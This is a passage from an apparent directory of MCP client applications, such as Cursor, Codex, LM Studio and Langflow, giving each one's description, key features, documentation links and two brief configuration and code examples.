* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Share custom MCP servers Cline creates with others via the `~/Documents/Cline/MCP` directory
* Displays configured MCP servers along with their tools, resources, and any error logs
CodeGPT is a popular VS Code and JetBrains extension that brings AI-powered coding assistance to your editor. It supports integration with MCP servers for tools, allowing users to leverage external AI capabilities directly within their development workflow.
**Key features:**
* Use MCP tools from any configured MCP server
* Seamless integration with VS Code and JetBrains UI
* Supports multiple LLM providers and custom endpoints
**Learn more:**
* [CodeGPT Documentation](https://docs.codegpt.co/)
Codex is a lightweight AI-powered coding agent from OpenAI that runs in your terminal.
**Key features:**
* Support for MCP tools (listing and invocation)
* Support for MCP resources (list, read, and templates)
* Elicitation support (routes requests to TUI for user input)
* Supports STDIO and HTTP streaming transports with OAuth
* Also available as VS Code extension
Continue is an open-source AI code assistant, with built-in support for all MCP features.
**Key features:**
* Type "@" to mention MCP resources
* Prompt templates surface as slash commands
* Use both built-in and MCP tools directly in chat
* Supports VS Code and JetBrains IDEs, with any LLM
Copilot-MCP enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
Cursor is an AI code editor.
**Key features:**
* Support for MCP tools in Cursor Composer
* Support for roots
* Support for prompts
* Support for elicitation
* Support for both STDIO and SSE
Daydreams is a generative agent framework for executing anything onchain.
**Key features:**
* Supports MCP Servers in config
* Exposes MCP Client
ECA is a free and open-source, editor-agnostic tool that aims to easily link LLMs and editors, giving the best UX possible for AI pair programming through a well-defined protocol.
**Key features:**
* **Editor-agnostic**: a protocol any editor can integrate.
* **Single configuration**: configure ECA once via global or local configs and it works the same in any editor.
* **Chat** interface: ask questions, review code, and work together on code.
* **Agentic**: let the LLM work as an agent with its native tools and the MCPs you configure.
* **Context** support: give the LLM more detail about your code, including MCP resources and prompts.
* **Multi-model**: log in to OpenAI, Anthropic, Copilot, local Ollama models, and many more.
* **OpenTelemetry**: export metrics on tool, prompt, and server usage.
Emacs Mcp is an Emacs client designed to interface with MCP servers, enabling seamless connections and interactions. It provides MCP tool invocation support for AI plugins like [gptel](https://github.com/karthink/gptel) and [llm](https://github.com/ahyatt/llm), adhering to Emacs' standard tool invocation format. This integration enhances the functionality of AI tools within the Emacs ecosystem.
**Key features:**
* Provides MCP tool support for Emacs.
fast-agent is a Python Agent framework, with simple declarative support for creating Agents and Workflows, with full multi-modal support for Anthropic and OpenAI models.
**Key features:**
* PDF and Image support, based on MCP Native types
* Interactive front-end to develop and diagnose Agent applications, including passthrough and playback simulators
* Built-in support for "Building Effective Agents" workflows.
* Deploy Agents as MCP Servers
Firebender is an IntelliJ plugin that offers a world-class coding agent with MCP integration for tool calling.
**Key features:**
* Tool integration for executing commands and scripts via STDIO; SSE is indirectly supported via the mcp-remote npm package.
* Local server connections for enhanced privacy and security
* MCPs can be installed via project rules or local workstation rules files.
* Individual tools within MCPs can be turned off.
FlowDown is a blazing fast and smooth client app for using AI/LLM, with a strong emphasis on privacy and user experience. It supports MCP servers to extend its capabilities with external tools, allowing users to build powerful, customized workflows.
**Key features:**
* **Seamless MCP Integration**: Easily connect to MCP servers to utilize a wide range of external tools.
* **Privacy-First Design**: Your data stays on your device. We don't collect any user data, ensuring complete privacy.
* **Lightweight & Efficient**: A compact and optimized design ensures a smooth and responsive experience with any AI model.
* **Broad Compatibility**: Works with all OpenAI-compatible service providers and supports local offline models through MLX.
* **Rich User Experience**: Features beautifully formatted Markdown, blazing-fast text rendering, and intelligent, automated chat titling.
**Learn more:**
* [FlowDown website](https://flowdown.ai/)
* [FlowDown documentation](https://apps.qaq.wiki/docs/flowdown/)
Think n8n + ChatGPT. FLUJO is a desktop application that integrates with MCP to provide a workflow-builder interface for AI interactions. Built with Next.js and React, it supports both online and offline (Ollama) models, manages API keys and environment variables centrally, and can install MCP servers from GitHub. FLUJO has a ChatCompletions endpoint, and flows can be executed from other AI applications like Cline, Roo, or Claude.
**Key features:**
* Environment & API Key Management
* Model Management
* MCP Server Integration
* Workflow Orchestration
* Chat Interface
Gemini CLI is an open-source AI agent that brings the power of Gemini directly into your terminal.
Programmatically assemble prompts for LLMs using GenAIScript (in JavaScript). Orchestrate LLMs, tools, and data in JavaScript.
**Key features:**
* JavaScript toolbox to work with prompts
* Abstraction to make it easy and productive
* Seamless Visual Studio Code integration
Genkit is a cross-language SDK for building and integrating GenAI features into applications. The [genkitx-mcp](https://github.com/firebase/genkit/tree/main/js/plugins/mcp) plugin enables consuming MCP servers as a client or creating MCP servers from Genkit tools and prompts.
**Key features:**
* Client support for tools and prompts (resources partially supported)
* Rich discovery with support in Genkit's Dev UI playground
* Seamless interoperability with Genkit's existing tools and prompts
* Works across a wide variety of GenAI models from top providers
Delegate tasks to GitHub Copilot coding agent and let it work in the background while you stay focused on the highest-impact and most interesting work.
**Key features:**
* Delegate tasks to Copilot from GitHub Issues, Visual Studio Code, GitHub Copilot Chat or from your favorite MCP host using the GitHub MCP Server
* Tailor Copilot to your project by [customizing the agent's development environment](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/customizing-the-development-environment-for-copilot-coding-agent#preinstalling-tools-or-dependencies-in-copilots-environment) or [writing custom instructions](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/best-practices-for-using-copilot-to-work-on-tasks#adding-custom-instructions-to-your-repository)
* [Augment Copilot's context and capabilities with MCP tools](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/agents/copilot-coding-agent/extending-copilot-coding-agent-with-mcp), with support for both local and remote MCP servers
Glama is a comprehensive AI workspace and integration platform that offers a unified interface to leading LLM providers, including OpenAI, Anthropic, and others. It supports the Model Context Protocol (MCP) ecosystem, enabling developers and enterprises to easily discover, build, and manage MCP servers.
**Key features:**
* Integrated [MCP Server Directory](https://glama.ai/mcp/servers)
* Integrated [MCP Tool Directory](https://glama.ai/mcp/tools)
* Host MCP servers and access them via the Chat or SSE endpoints
* Ability to chat with multiple LLMs and MCP servers at once
* Upload and analyze local files and data
* Full-text search across all your chats and data
goose is an open source AI agent that supercharges your software development by automating coding tasks.
**Key features:**
* Expose MCP functionality to goose through tools.
* MCPs can be installed directly via the [extensions directory](https://block.github.io/goose/v1/extensions/), CLI, or UI.
* goose allows you to extend its functionality by [building your own MCP servers](https://block.github.io/goose/docs/tutorials/custom-extensions).
* Includes built-in extensions for development, memory, computer control, and auto-visualization.
gptme is an open-source, terminal-based personal AI assistant/agent, designed to assist with programming tasks and general knowledge work.
**Key features:**
* CLI-first design with a focus on simplicity and ease of use
* Rich set of built-in tools for shell commands, Python execution, file operations, and web browsing
* Local-first approach with support for multiple LLM providers
* Open-source, built to be extensible and easy to modify
HyperAgent is Playwright supercharged with AI. With HyperAgent, you no longer need brittle scripts, just powerful natural language commands. Using MCP servers, you can extend the capability of HyperAgent, without having to write any code.
**Key features:**
* AI Commands: Simple APIs like page.ai(), page.extract() and executeTask() for any AI automation
* Fallback to Regular Playwright: Use regular Playwright when AI isn't needed
* Stealth Mode: Avoid detection with built-in anti-bot patches
* Cloud Ready: Instantly scale to hundreds of sessions via [Hyperbrowser](https://www.hyperbrowser.ai/)
* MCP Client: Connect to tools like Composio for full workflows (e.g. writing web data to Google Sheets)
Jenova is an MCP client designed for non-technical users, especially on mobile.
**Key features:**
* 30+ pre-integrated MCP servers with one-click integration of custom servers
* MCP recommendation capability that suggests the best servers for specific tasks
* Multi-agent architecture with leading tool use reliability and scalability, supporting unlimited concurrent MCP server connections through RAG-powered server metadata
* Model agnostic platform supporting any leading LLMs (OpenAI, Anthropic, Google, etc.)
* Unlimited chat history and global persistent memory powered by RAG
* Easy creation of custom agents with custom models, instructions, knowledge bases, and MCP servers
* Local MCP server (STDIO) support coming soon with desktop apps
JetBrains AI Assistant plugin provides AI-powered features for software development available in all JetBrains IDEs.
**Key features:**
* Unlimited code completion powered by Mellum, JetBrains' proprietary AI model.
* Context-aware AI chat that understands your code and helps you in real time.
* Access to top-tier models from OpenAI, Anthropic, and Google.
* Offline mode with connected local LLMs via Ollama or LM Studio.
* Deep integration into IDE workflows, including code suggestions in the editor, VCS assistance, runtime error explanation, and more.
Junie is JetBrains' AI coding agent for JetBrains IDEs and Android Studio.
**Key features:**
* Connects to MCP servers over **stdio** to use external tools and data sources.
* Per-command approval with an optional allowlist.
* Config via `mcp.json` (global `~/.junie/mcp.json` or project `.junie/mcp/`).
Kilo Code is an autonomous AI coding dev team in VS Code that edits files, runs commands, uses a browser, and more.
**Key features:**
* Create and add tools through natural language (e.g. "add a tool that searches the web")
* Discover MCP servers via the MCP Marketplace
* One-click MCP server installs via MCP Marketplace
* Displays configured MCP servers along with their tools, resources, and any error logs
Klavis AI is open-source infrastructure to use, build, and scale MCPs with ease.
**Key features:**
* Slack/Discord/Web MCP clients for using MCPs directly
* Simple web UI dashboard for easy MCP configuration
* Direct OAuth integration with Slack & Discord Clients and MCP Servers for secure user authentication
* SSE transport support
**Learn more:**
* [Demo video showing MCP usage in Slack/Discord](https://youtu.be/9-QQAhrQWw8)
Langdock is the enterprise-ready solution for rolling out AI to all of your employees while enabling your developers to build and deploy custom AI workflows on top.
**Key features:**
* Remote MCP Server (SSE & Streamable HTTP) support, connect to any MCP server via OAuth, API Key, or without authentication.
* MCP Tool discovery and management, including tool confirmation UI.
* Enterprise-grade security and compliance features
Langflow is an open-source visual builder that lets developers rapidly prototype and build AI applications. It integrates with the Model Context Protocol (MCP) as both an MCP server and an MCP client.
**Key features:**
* Full support for using MCP server tools to build agents and flows.
* Export agents and flows as MCP server
* Local & remote server connections for enhanced privacy and security
**Learn more:**
* [Demo video showing how to use Langflow as both an MCP client & server](https://www.youtube.com/watch?v=pEjsaVVPjdI)
LibreChat is an open-source, customizable AI chat UI that supports multiple AI providers, now including MCP integration.
**Key features:**
* Extend current tool ecosystem, including [Code Interpreter](https://www.librechat.ai/docs/features/code_interpreter) and Image generation tools, through MCP servers
* Add tools to customizable [Agents](https://www.librechat.ai/docs/features/agents), using a variety of LLMs from top providers
* Open-source and self-hostable, with secure multi-user support
* Future roadmap includes expanded MCP feature support
LM Studio is a cross-platform desktop app for discovering, downloading, and running open-source LLMs locally. You can now connect local models to tools via Model Context Protocol (MCP).
**Key features:**
* Use MCP servers with local models on your computer. Add entries to `mcp.json` and save to get started (see the sketch after this list).
* Tool confirmation UI: when a model calls a tool, you can confirm the call in the LM Studio app.
* Cross-platform: runs on macOS, Windows, and Linux, one-click installer with no need to fiddle in the command line
* Supports GGUF (llama.cpp) or MLX models with GPU acceleration
* GUI & terminal mode: use the LM Studio app or CLI (lms) for scripting and automation
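A minimal sketch of such an entry, assuming the common `mcpServers` layout that LM Studio's `mcp.json` follows; the server name and URL below are placeholders, and the exact schema is described in the docs linked under Learn more:

```json theme={null}
{
  "mcpServers": {
    "example-remote": {
      "url": "https://example.com/mcp"
    }
  }
}
```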
**Learn more:**
* [Docs: Using MCP in LM Studio](https://lmstudio.ai/docs/app/plugins/mcp)
* [Create a 'Add to LM Studio' button for your server](https://lmstudio.ai/docs/app/plugins/mcp/deeplink)
* [Announcement blog: LM Studio + MCP](https://lmstudio.ai/blog/mcp)
LM-Kit.NET is a local-first Generative AI SDK for .NET (C# / VB.NET) that can act as an **MCP client**. Current MCP support: **Tools only**.
**Key features:**
* Consume MCP server tools over HTTP/JSON-RPC 2.0 (initialize, list tools, call tools).
* Programmatic tool discovery and invocation via `McpClient`.
* Easy integration in .NET agents and applications.
**Learn more:**
* [Docs: Using MCP in LM-Kit.NET](https://docs.lm-kit.com/lm-kit-net/api/LMKit.Mcp.Client.McpClient.html)
* [Creating AI agents](https://lm-kit.com/solutions/ai-agents)
* Product page: [LM-Kit.NET](https://lm-kit.com/products/lm-kit-net/)
Lutra is an AI agent that transforms conversations into actionable, automated workflows.
**Key features:**
* Easy MCP Integration: Connecting Lutra to MCP servers is as simple as providing the server URL; Lutra handles the rest behind the scenes.
* Chat to Take Action: Lutra understands your conversational context and goals, automatically integrating with your existing apps to perform tasks.
* Reusable Playbooks: After completing a task, save the steps as reusable, automated workflows—simplifying repeatable processes and reducing manual effort.
* Shareable Automations: Easily share your saved playbooks with teammates to standardize best practices and accelerate collaborative workflows.
**Learn more:**
* [Lutra AI agent explained (video)](https://www.youtube.com/watch?v=W5ZpN0cMY70)
MCP Bundler is a local proxy for your MCP workflow. The app centralizes all your MCP servers — toggle, group, or turn off capabilities instantly. Switch bundles on the fly inside the MCP Bundler.
**Key features:**
* Unified Control Panel: Manage all your MCP servers — both Local STDIO and Remote HTTP/SSE — from one clear macOS window. Start, stop, or edit them instantly without touching configs.
* One Click, All Connected: Launch or disable entire MCP setups with one toggle. Switch bundles per project or workspace and keep your AI tools synced automatically.
* Per-Tool Control: Enable or hide individual tools inside each server. Keep your bundles clean, lightweight, and tailored for every AI workflow.
* Instant Health & Logs: Real-time health indicators and request logs show exactly what's running. Diagnose and fix connection issues without leaving the app.
* Auto-Generate MCP Config: Copy a ready-made JSON snippet for any client in seconds. No manual wiring — connect your Bundler as a single MCP endpoint.
**Learn more:**
* [MCP Bundler in action (video)](https://www.youtube.com/watch?v=CEHVSShw_NU)
MCPBundles provides MCPBundle Studio, a browser-based MCP client for testing and executing MCP tools on remote MCP servers.
**Key features:**
* Discover and inspect available tools with parameter schemas and descriptions
* Supports OAuth and API key authentication for secure provider connections
* Execute MCP tools with form-based and chat-based input
* Implements Apps for rendering interactive UI responses from tools
* Streamable HTTP transport for remote MCP server connections
mcp-agent is a simple, composable framework to build agents using Model Context Protocol.
**Key features:**
* Automatic connection management of MCP servers.
* Expose tools from multiple servers to an LLM.
* Implements every pattern defined in [Building Effective Agents](https://www.anthropic.com/research/building-effective-agents).
* Supports workflow pause/resume signals, such as waiting for human feedback.
mcp-client-chatbot is a local-first chatbot built with Vercel's Next.js, AI SDK, and Shadcn UI.
**Key features:**
* It supports standard MCP tool calling and includes both a custom MCP server and a standalone UI for testing MCP tools outside the chat flow.
* All MCP tools are provided to the LLM by default, but the project also includes an optional `@toolname` mention feature to make tool invocation more explicit—particularly useful when connecting to multiple MCP servers with many tools.
* Visual workflow builder that lets you create custom tools by chaining LLM nodes and MCP tools together. Published workflows become callable as `@workflow_name` tools in chat, enabling complex multi-step automation sequences.
mcp-use is an open-source Python library that makes it easy to connect any LLM to any MCP server, both locally and remotely.
**Key features:**
* Very simple interface to connect any LLM to any MCP server.
* Supports the creation of custom agents and workflows.
* Supports connections to multiple MCP servers simultaneously.
* Supports all LangChain-supported models, including local ones.
* Offers efficient tool orchestration and search functionality.
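A minimal sketch of the library's client/agent pattern; the config file name, model choice, and query are placeholders, and the exact API may differ between versions:

```python theme={null}
import asyncio

from langchain_openai import ChatOpenAI
from mcp_use import MCPAgent, MCPClient


async def main():
    # Load MCP server definitions from an mcpServers-style JSON config
    client = MCPClient.from_config_file("mcp_config.json")

    # Pair any LangChain-supported model with the connected MCP tools
    agent = MCPAgent(llm=ChatOpenAI(model="gpt-4o"), client=client)

    result = await agent.run("Summarize the tools you have available")
    print(result)


asyncio.run(main())
```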
`mcpc` is a universal CLI client for MCP that maps MCP operations to intuitive commands for interactive shell use, scripts, and AI coding agents.
**Key features:**
* Swiss Army knife for MCP: supports stdio and streamable HTTP, server config files and zero config, OAuth 2.1, HTTP headers, and main MCP features.
* Persistent sessions for interaction with multiple servers simultaneously.
* Structured text output enables AI agents to explore and interact with MCP servers.
* JSON output and schema validation allow stable integration with other CLI tools, scripting, and MCP **code mode** in a shell.
* Proxy MCP server to provide AI code sandboxes with secure access to authenticated MCP sessions.
MCPHub is a powerful Neovim plugin that integrates MCP (Model Context Protocol) servers into your workflow.
**Key features:**
* Install, configure and manage MCP servers with an intuitive UI.
* Built-in Neovim MCP server with support for file operations (read, write, search, replace), command execution, terminal integration, LSP integration, buffers, and diagnostics.
* Create Lua-based MCP servers directly in Neovim.
* Integrates with popular Neovim chat plugins Avante.nvim and CodeCompanion.nvim
MCPJam Inspector is the local development client for ChatGPT apps, MCP ext-apps, and MCP servers.
**Key features:**
* Local emulator for ChatGPT Apps SDK and MCP ext-apps. No more ChatGPT subscription or ngrok needed.
* OAuth debugger to visually inspect MCP server OAuth at every step.
* LLM playground to chat with your MCP server against any LLM. We provide our own API tokens for free.
* Connect, test, and inspect any MCP server that's local or remote. Manually invoke MCP tools, resources, prompts, etc. View all JSON-RPC logs.
* Supports all transports - STDIO, SSE, and Streamable HTTP.
MCPOmni-Connect is a versatile command-line interface (CLI) client designed to connect to various Model Context Protocol (MCP) servers using both stdio and SSE transport.
**Key features:**
* Support for resources, prompts, tools, and sampling
* Agentic mode with ReAct and orchestrator capabilities
* Seamless integration with OpenAI models and other LLMs
* Dynamic tool and resource management across multiple servers
* Support for both stdio and SSE transport protocols
* Comprehensive tool orchestration and resource analysis capabilities
Memex is the first all-in-one desktop app to combine an MCP client with an MCP server builder. Unlike traditional MCP clients that only consume existing servers, Memex can create custom MCP servers from natural language prompts, immediately integrate them into its toolkit, and use them to solve problems—all within a single conversation.
**Key features:**
* **Prompt-to-MCP Server**: Generate fully functional MCP servers from natural language descriptions
* **Self-Testing & Debugging**: Autonomously test, debug, and improve created MCP servers
* **Universal MCP Client**: Works with any MCP server through intuitive, natural language integration
* **Curated MCP Directory**: Access to tested, one-click installable MCP servers (Neon, Netlify, GitHub, Context7, and more)
* **Multi-Server Orchestration**: Leverage multiple MCP servers simultaneously for complex workflows
**Learn more:**
* [Memex Launch 2: MCP Teams and Agent API](https://memex.tech/blog/memex-launch-2-mcp-teams-and-agent-api-private-preview-125f)
[Memgraph Lab](https://memgraph.com/lab) is a visualization and management tool for Memgraph graph databases. Its [GraphChat](https://memgraph.com/docs/memgraph-lab/features/graphchat) feature lets you query graph data using natural language, with MCP server integrations to extend your AI workflows.
**Key features:**
* Build GraphRAG workflows powered by knowledge graphs as the data backbone
* Connect remote MCP servers via `SSE` or `Streamable HTTP`
* Support for MCP tools, sampling, elicitation, and instructions
* Create multiple agents with different configurations for easy comparison and debugging
* Works with various LLM providers (OpenAI, Azure OpenAI, Anthropic, Gemini, Ollama, DeepSeek)
* Available as a Desktop app or Docker container
**Learn more:**
* [Memgraph Lab: MCP integration](https://memgraph.com/docs/memgraph-lab/features/graphchat#mcp-servers)
Microsoft Copilot Studio is a robust SaaS platform designed for building custom AI-driven applications and intelligent agents, empowering developers to create, deploy, and manage sophisticated AI solutions.
**Key features:**
* Support for MCP tools
* Extend Copilot Studio agents with MCP servers
* Leverage Microsoft's unified, governed, and secure API management solutions
MindPal is a no-code platform for building and running AI agents and multi-agent workflows for business processes.
**Key features:**
* Build custom AI agents with no-code
* Connect any SSE MCP server to extend agent tools
* Create multi-agent workflows for complex business processes
* User-friendly for both technical and non-technical professionals
* Ongoing development with continuous improvement of MCP support
**Learn more:**
* [MindPal MCP Documentation](https://docs.mindpal.io/agent/mcp)
Le Chat is Mistral AI's assistant, with MCP support for remote servers and enterprise workflows.
**Key features:**
* Remote MCP server integration
* Enterprise-grade security
* Low-latency, high-throughput interactions with structured data
**Learn more:**
* [Mistral MCP Documentation](https://help.mistral.ai/en/collections/911943-connectors)
modelcontextchat.com is a web-based MCP client designed for working with remote MCP servers, featuring comprehensive authentication support and integration with OpenRouter.
**Key features:**
* Web-based interface for remote MCP server connections
* Header-based Authorization support for secure server access
* OAuth authentication integration
* OpenRouter API Key support for accessing various LLM providers
* No installation required - accessible from any web browser
MooPoint is a web-based AI chat platform built for developers and advanced users, letting you interact with multiple large language models (LLMs) through a single, unified interface. Connect your own API keys (OpenAI, Anthropic, and more) and securely manage custom MCP server integrations.
**Key features:**
* Accessible from any PC or smartphone—no installation required
* Choose your preferred LLM provider
* Supports `SSE`, `Streamable HTTP`, `npx`, and `uvx` MCP servers
* OAuth and sampling support
* New features added daily
Msty Studio is a privacy-first AI productivity platform that seamlessly integrates local and online language models (LLMs) into customizable workflows. Designed for both technical and non-technical users, Msty Studio offers a suite of tools to enhance AI interactions, automate tasks, and maintain full control over data and model behavior.
**Key features:**
* **Toolbox & Toolsets**: Connect AI models to local tools and scripts using MCP-compliant configurations. Group tools into Toolsets to enable dynamic, multi-step workflows within conversations.
* **Turnstiles**: Create automated, multi-step AI interactions, allowing for complex data processing and decision-making flows.
* **Real-Time Data Integration**: Enhance AI responses with up-to-date information by integrating real-time web search capabilities.
* **Split Chats & Branching**: Engage in parallel conversations with multiple models simultaneously, enabling comparative analysis and diverse perspectives.
**Learn more:**
* [Msty Studio Documentation](https://docs.msty.studio/features/toolbox/tools)
Needle is a RAG workflow platform that also works as an MCP client, letting you connect and use MCP servers in seconds.
**Key features:**
* **Instant MCP integration:** Connect any remote MCP server to your collection in seconds
* **Built-in RAG:** Automatically get retrieval-augmented generation out of the box
* **Secure OAuth:** Safe, token-based authorization when connecting to servers
* **Smart previews:** See what each MCP server can do and selectively enable the tools you need
**Learn more:**
* [Getting Started](https://docs.needle.app/docs/guides/hello-needle/getting-started/)
NVIDIA Agent Intelligence (AIQ) toolkit is a flexible, lightweight, and unifying library that allows you to easily connect existing enterprise agents to data sources and tools across any framework.
**Key features:**
* Acts as an MCP **client** to consume remote tools
* Acts as an MCP **server** to expose tools
* Framework agnostic and compatible with LangChain, CrewAI, Semantic Kernel, and custom agents
* Includes built-in observability and evaluation tools
**Learn more:**
* [AIQ toolkit MCP documentation](https://docs.nvidia.com/aiqtoolkit/latest/workflows/mcp/index.html)
OpenCode is an open source AI coding agent. It’s available as a terminal-based interface, desktop app, or IDE extension.
**Key features:**
* Support for MCP tools
* Support for MCP resources in the CLI using the `@` prefix
* Support for MCP prompts in the CLI as slash commands using the `/` prefix
OpenSumi is a framework that helps you quickly build AI-native IDE products.
**Key features:**
* Supports MCP tools in OpenSumi
* Supports built-in IDE MCP servers and custom MCP servers
oterm is a terminal client for Ollama allowing users to create chats/agents.
**Key features:**
* Support for multiple fully customizable chat sessions with Ollama connected with tools.
* Support for MCP tools.
Postman is the most popular API client and now supports MCP server testing and debugging.
**Key features:**
* Full support of all major MCP features (tools, prompts, resources, and subscriptions)
* Fast, seamless UI for debugging MCP capabilities
* MCP config integration (Claude, VSCode, etc.) for fast first-time experience in testing MCPs
* Integration with history, variables, and collections for reuse and collaboration
Proxyman is a native macOS app for HTTP debugging and network monitoring. It now includes an MCP Server that enables AI assistants (Claude, Cursor, and other MCP-compatible tools) to directly interact with Proxyman for inspecting HTTP traffic, creating debugging rules, and controlling the app through natural language.
**Key features:**
* **AI-Powered Debugging**: Ask AI to analyze captured traffic, find specific requests, or explain API responses
* **Hands-Free Rule Creation**: Create breakpoints, map local/remote rules through conversation
* **Traffic Inspection Tools**: Get flows, flow details, export cURL commands, and filter traffic with multiple criteria
* **Session Control**: Clear sessions, toggle recording, and manage SSL proxying domains
* **Secure by Design**: Localhost-only server with per-session token authentication
**Learn more:**
* [Proxyman MCP Documentation](https://docs.proxyman.com/mcp)
* [Proxyman Website](https://proxyman.com)
RecurseChat is a powerful, fast, local-first chat client with MCP support. RecurseChat supports multiple AI providers, including LLaMA.cpp, Ollama, OpenAI, and Anthropic.
**Key features:**
* Local AI: Support MCP with Ollama models.
* MCP Tools: Individual MCP server management. Easily visualize the connection states of MCP servers.
* MCP Import: Import configuration from Claude Desktop app or JSON
**Learn more:**
* [RecurseChat docs](https://recurse.chat/docs/features/mcp/)
Replit Agent is an AI-powered software development tool that builds and deploys applications through natural language. It supports MCP integration, enabling users to extend the agent's capabilities with custom tools and data sources.
**Learn more:**
* [Replit MCP Documentation](https://docs.replit.com/replitai/mcp/overview)
* [MCP Install Links](https://docs.replit.com/replitai/mcp/install-links)
Roo Code enables AI coding assistance via MCP.
**Key features:**
* Support for MCP tools and resources
* Integration with development workflows
* Extensible AI capabilities
[rtrvr.ai](https://rtrvr.ai) is an AI web agent Chrome extension that autonomously runs complex browser workflows, retrieves data to Sheets, and calls APIs/MCP servers – all with just prompting and within your own browser!
**Key features:**
* Easy MCP Integration within your browser: Just open the Chrome Extension, add the server URL, and prompt server calls with the web as context!
* Remote control your browser by turning your browser into MCP Server: Just copy/paste MCP URL into any MCP Client (no npx needed), and trigger agentic browser workflows!
* Prompt our agent to execute workflows combining web agentic actions with MCP tool calls; find someone's email on the web and then send them an email with Zapier MCP.
* Reusable and Schedulable Automations: After running a workflow, easily rerun or put on a schedule to execute in the background while you do other tasks in your browser.
Shortwave is an AI-powered email client that supports MCP tools to enhance email productivity and workflow automation.
**Key features:**
* MCP tool integration for enhanced email workflows
* Rich UI for adding, managing and interacting with a wide range of MCP servers
* Support for both remote (Streamable HTTP and SSE) and local (Stdio) MCP servers
* AI assistance for managing your emails, calendar, tasks and other third-party services
Simtheory is an agentic AI workspace that unifies multiple AI models, tools, and capabilities under a single subscription. It provides comprehensive MCP support through its MCP Store, allowing users to extend their workspace with productivity tools and integrations.
**Key features:**
* **MCP Store**: Marketplace for productivity tools and MCP server integrations
* **Parallel Tasking**: Run multiple AI tasks simultaneously with MCP tool support
* **Model Catalogue**: Access to frontier models with MCP tool integration
* **Hosted MCP Servers**: Plug-and-play MCP integrations with no technical setup
* **Advanced MCPs**: Specialized tools like Tripo3D (3D creation), Podcast Maker, and Video Maker
* **Enterprise Ready**: Flexible workspaces with granular access control for MCP tools
**Learn more:**
* [Simtheory website](https://simtheory.ai)
Slack MCP Client acts as a bridge between Slack and Model Context Protocol (MCP) servers. Using Slack as the interface, it enables large language models (LLMs) to connect and interact with various MCP servers through standardized MCP tools.
**Key features:**
* **Supports Popular LLM Providers:** Integrates seamlessly with leading large language model providers such as OpenAI, Anthropic, and Ollama, allowing users to leverage advanced conversational AI and orchestration capabilities within Slack.
* **Dynamic and Secure Integration:** Supports dynamic registration of MCP tools, works in both channels and direct messages and manages credentials securely via environment variables or Kubernetes secrets.
* **Easy Deployment and Extensibility:** Offers official Docker images, a Helm chart for Kubernetes, and Docker Compose for local development, making it simple to deploy, configure, and extend with additional MCP servers or tools.
Smithery Playground is a developer-first MCP client for exploring, testing and debugging MCP servers against LLMs. It provides detailed traces of MCP RPCs to help troubleshoot implementation issues.
**Key features:**
* One-click connect to MCP servers via URL or from Smithery's registry
* Develop MCP servers that are running on localhost
* Inspect tools, prompts, resources, and sampling configurations with live previews
* Run conversational or raw tool calls to verify MCP behavior before shipping
* Full OAuth MCP-spec support
SpinAI is an open-source TypeScript framework for building observable AI agents. The framework provides native MCP compatibility, allowing agents to seamlessly integrate with MCP servers and tools.
**Key features:**
* Built-in MCP compatibility for AI agents
* Open-source TypeScript framework
* Observable agent architecture
* Native support for MCP tools integration
Superinterface is AI infrastructure and a developer platform to build in-app AI assistants with support for MCP, interactive components, client-side function calling and more.
**Key features:**
* Use tools from MCP servers in assistants embedded via React components or script tags
* SSE transport support
* Use any AI model from any AI provider (OpenAI, Anthropic, Ollama, others)
Superjoin is a Google Sheets extension that brings the power of MCP directly into your spreadsheets. With Superjoin, users can access and invoke MCP tools and agents without leaving their sheets, enabling powerful AI workflows and automation right where their data lives.
**Key features:**
* Native Google Sheets add-on providing effortless access to MCP capabilities
* Supports OAuth 2.1 and header-based authentication for secure and flexible connections
* Compatible with both SSE and Streamable HTTP transport for efficient, real-time streaming communication
* Fully web-based, cross-platform client requiring no additional software installation
Swarms is a production-grade multi-agent orchestration framework that supports MCP integration for dynamic tool discovery and execution.
**Key features:**
* Connects to MCP servers via SSE transport for real-time tool integration
* Automatic tool discovery and loading from MCP servers
* Support for distributed tool functionality across multiple agents
* Enterprise-ready with high availability and observability features
* Modular architecture supporting multiple AI model providers
**Learn more:**
* [Swarms MCP Integration Documentation](https://docs.swarms.world/en/latest/swarms/tools/tools_examples/)
systemprompt is a voice-controlled mobile app that manages your MCP servers. Securely leverage MCP agents from your pocket. Available on iOS and Android.
**Key features:**
* **Native Mobile Experience**: Access and manage your MCP servers anytime, anywhere on both Android and iOS devices
* **Advanced AI-Powered Voice Recognition**: Sophisticated voice recognition engine enhanced with cutting-edge AI and Natural Language Processing (NLP), specifically tuned to understand complex developer terminology and command structures
* **Unified Multi-MCP Server Management**: Effortlessly manage and interact with multiple Model Context Protocol (MCP) servers from a single, centralized mobile application
Tambo is a platform for building custom chat experiences in React, with integrated custom user interface components.
**Key features:**
* Hosted platform with React SDK for integrating chat or other LLM-based experiences into your own app.
* Support for selection of arbitrary React components in the chat experience, with state management and tool calling.
* Support for MCP servers, from Tambo's servers or directly from the browser.
* Supports OAuth 2.1 and custom header-based authentication.
* Support for MCP tools and sampling, with additional MCP features coming soon.
Tencent CloudBase AI DevKit is a tool for building AI agents in minutes, featuring zero-code tools, secure data integration, and extensible plugins via MCP.
**Key features:**
* Support for MCP tools
* Extend agents with MCP servers
* MCP servers hosting: serverless hosting and authentication support
Theia AI is a framework for building AI-enhanced tools and IDEs. The [AI-powered Theia IDE](https://eclipsesource.com/blogs/2024/10/08/introducting-ai-theia-ide/) is an open and flexible development environment built on Theia AI.
**Key features:**
* **Tool Integration**: Theia AI enables AI agents, including those in the Theia IDE, to utilize MCP servers for seamless tool interaction.
* **Customizable Prompts**: The Theia IDE allows users to define and adapt prompts, dynamically integrating MCP servers for tailored workflows.
* **Custom agents**: The Theia IDE supports creating custom agents that leverage MCP capabilities, enabling users to design dedicated workflows on the fly.
Theia AI and Theia IDE's MCP integration provide users with flexibility, making them powerful platforms for exploring and adapting MCP.
**Learn more:**
* [Theia IDE and Theia AI MCP Announcement](https://eclipsesource.com/blogs/2024/12/19/theia-ide-and-theia-ai-support-mcp/)
* [Download the AI-powered Theia IDE](https://theia-ide.org/)
Tome is an open source cross-platform desktop app designed for working with local LLMs and MCP servers. It is designed to be beginner friendly and abstract away the nitty gritty of configuration for people getting started with MCP.
**Key features:**
* MCP servers are managed by Tome so there is no need to install uv or npm or configure JSON
